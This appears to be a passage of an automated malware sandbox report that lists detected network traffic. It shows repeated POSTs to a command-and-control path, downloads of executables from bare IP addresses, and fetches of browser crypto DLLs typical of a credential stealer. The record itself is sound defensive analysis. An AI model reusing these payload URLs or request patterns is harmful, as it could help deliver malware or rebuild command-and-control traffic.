Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://nspuoowkrfsuk.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 187Host: dbfhns.in
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://gcvwrsnytusejtdk.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 334Host: dbfhns.in
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://jebcasiwwjgorbsq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 133Host: dbfhns.in
Source: global traffic	HTTP traffic detected: GET /pintxi1lv.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 23.145.40.124
Source: global traffic	HTTP traffic detected: GET /file/host_so.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.235.137.54
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://bshlmattfttfdb.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 269Host: dbfhns.in
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://bngikvknmtdpor.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 135Host: dbfhns.in
Source: global traffic	HTTP traffic detected: GET /sdf34ert3etgrthrthfghfghjfgh.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 91.202.233.231
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://amkihwobrgvem.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 340Host: dbfhns.in
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://bdtrshdmdsajiin.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 338Host: dbfhns.in
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://depvhlbmmte.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 357Host: dbfhns.in
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://barvntqgmwgcruw.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 358Host: dbfhns.in
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://cmmajutpfcykk.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 277Host: dbfhns.in
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://jrlquvadpwx.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 128Host: dbfhns.in
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://lmlmhdjgxcsr.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 228Host: dbfhns.in
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://dhyltqofxhpe.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 260Host: dbfhns.in
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://nxoumlltphj.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 196Host: dbfhns.in
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://etetxpvheghmlur.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 272Host: dbfhns.in
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://spdxbqopubx.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 283Host: dbfhns.in
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://pxinixbdcjjccvdo.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 343Host: dbfhns.in
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://euirtythbemo.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 326Host: dbfhns.in
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://btndjessgdxlt.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 359Host: dbfhns.in
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://nfymgppnbopwxnwd.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 215Host: dbfhns.in
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ckgltynaavllsolq.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 231Host: dbfhns.in
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://hbtkypdfbiu.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 187Host: dbfhns.in
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://haglmiwlgvefe.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 263Host: dbfhns.in
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://dnvpkenpnlmca.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 347Host: dbfhns.in
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://qvgxhyimdjdqth.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 264Host: dbfhns.in

Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86

Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp

Code function: 12_2_6D0CCC60 PR_Recv,

12_2_6D0CCC60

Source: global traffic	HTTP traffic detected: GET /profiles/76561199689717899 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sqls.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /file/update.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 45.129.96.86
Source: global traffic	HTTP traffic detected: GET /pintxi1lv.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 23.145.40.124
Source: global traffic	HTTP traffic detected: GET /file/host_so.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.235.137.54
Source: global traffic	HTTP traffic detected: GET /sdf34ert3etgrthrthfghfghjfgh.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 91.202.233.231

Source: katDDA4.tmp, 0000000C.00000003.2068424955.0000000000963000.00000004.00000020.00020000.00000000.sdmp

String found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: dbfhns.in
Source: global traffic	DNS traffic detected: DNS query: 15.164.165.52.in-addr.arpa
Source: global traffic	DNS traffic detected: DNS query: whispedwoodmoodsksl.shop
Source: global traffic	DNS traffic detected: DNS query: steamcommunity.com

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: whispedwoodmoodsksl.shop

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 27 May 2024 13:23:27 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 04 00 00 00 72 e8 85 ed Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 27 May 2024 13:23:28 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 27 May 2024 13:23:29 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 27 May 2024 13:23:31 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 27 May 2024 13:23:32 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 27 May 2024 13:23:34 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 2d 5e 24 17 a6 61 44 a2 ae 09 ab c8 ad ac 2b 98 2b 9a ed 33 5e 14 98 8f c1 cb 7c d1 Data Ascii: #\-^$aD++3^\|
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 27 May 2024 13:23:38 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
